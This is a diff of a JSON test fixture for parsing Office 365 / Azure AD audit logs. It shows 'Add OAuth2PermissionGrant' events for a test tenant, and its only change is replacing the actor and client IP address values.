 "CreationTime": "2020-02-10T15:30:06",
 "ExtendedProperties": [
 {
@@ -14286,7 +14286,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -14316,9 +14316,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:30:06",
 "ExtendedProperties": [
 {
@@ -14552,7 +14552,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -14582,9 +14582,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:30:06",
 "ExtendedProperties": [
 {
